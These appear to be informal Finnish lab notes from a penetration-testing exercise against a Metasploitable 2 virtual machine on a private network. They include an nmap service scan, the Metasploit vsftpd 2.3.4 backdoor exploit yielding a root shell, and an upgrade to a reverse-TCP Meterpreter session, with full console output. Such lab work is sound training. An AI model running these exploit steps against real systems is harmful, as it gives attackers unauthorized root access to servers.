## tee virtsari kone:

~/meta3mfetamiini# cat vagrantfile 
Vagrant.configure("2") do |config|
	config.vm.box = "tonijaaskelainen/ms2"
	config.vm.network "private_network", :type => "dhcp", :adapter => 1
end

ip route
~# ip route
default via 172.28.1.254 dev eth0 proto dhcp metric 100 
172.28.0.0/16 dev eth0 proto kernel scope link src 172.28.171.64 metric 100 
172.28.128.0/24 dev vboxnet0 proto kernel scope link src 172.28.128.1 

VBOXNET0 = virtuaalikoneen verkko. tää porttiskanniin

msfdb init
msfconsole

##porttiskannaus

db_nmap 172.28.128.0/24 -n -sV -p 21,80,443 -vvv

##skannauksen versiot
msf5 > services --up
Services
========

host          port  proto  name  state  info
----          ----  -----  ----  -----  ----
172.28.128.3  21    tcp    ftp   open   vsftpd 2.3.4
172.28.128.3  80    tcp    http  open   Apache httpd 2.2.8 (Ubuntu) DAV/2

wat it do? vsftpd 2.3.4 testiin

msf5 > set RHOST 172.28.128.3

msf5 > services --search vsftpd

msf5 > search vsftpd

Matching Modules
================

   Name                                  Disclosure Date  Rank       Check  Description
   ----                                  ---------------  ----       -----  -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution


msf5 > use exploit/unix/ftp/vsftpd_234_backdoor 

msf5 > set RHOSTS 172.28.128.3
RHOSTS => 172.28.128.3
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.28.128.3     yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

##taustalle
background

msf5 exploit(unix/ftp/vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpreter 
msf5 post(multi/manage/shell_to_meterpreter) > options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION  1                yes       The session to run this module on.

msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               172.28.128.1:43161 -> 172.28.128.3:6200 (172.28.128.3)
  6         shell cmd/unix               172.28.128.1:38441 -> 172.28.128.3:6200 (172.28.128.3)

msf5 post(multi/manage/shell_to_meterpreter) > set session 6
session => 6
msf5 post(multi/manage/shell_to_meterpreter) > exploit

[*] Upgrading session ID: 6
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 172.28.128.1:4433 
[*] Sending stage (914728 bytes) to 172.28.128.3
[*] Meterpreter session 7 opened (172.28.128.1:4433 -> 172.28.128.3:33961) at 2019-05-24 09:09:40 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
[*] Post module execution completed
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    172.28.128.1:43161 -> 172.28.128.3:6200 (172.28.128.3)
  6         shell cmd/unix                                                                    172.28.128.1:38441 -> 172.28.128.3:6200 (172.28.128.3)
  7         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  172.28.128.1:4433 -> 172.28.128.3:33961 (172.28.128.3)

msf5 post(multi/manage/shell_to_meterpreter) > session 7
[*] Stopping exploit/multi/handler

[-] Unknown command: session.
msf5 post(multi/manage/shell_to_meterpreter) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                                Connection
  --  ----  ----                   -----------                                                ----------
  1         shell cmd/unix                                                                    172.28.128.1:43161 -> 172.28.128.3:6200 (172.28.128.3)
  6         shell cmd/unix                                                                    172.28.128.1:38441 -> 172.28.128.3:6200 (172.28.128.3)
  7         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain  172.28.128.1:4433 -> 172.28.128.3:33961 (172.28.128.3)

msf5 post(multi/manage/shell_to_meterpreter) > sessions 7
[*] Starting interaction with 7...

meterpreter > 
meterpreter > help

toimi tosiaa restardin jälkee
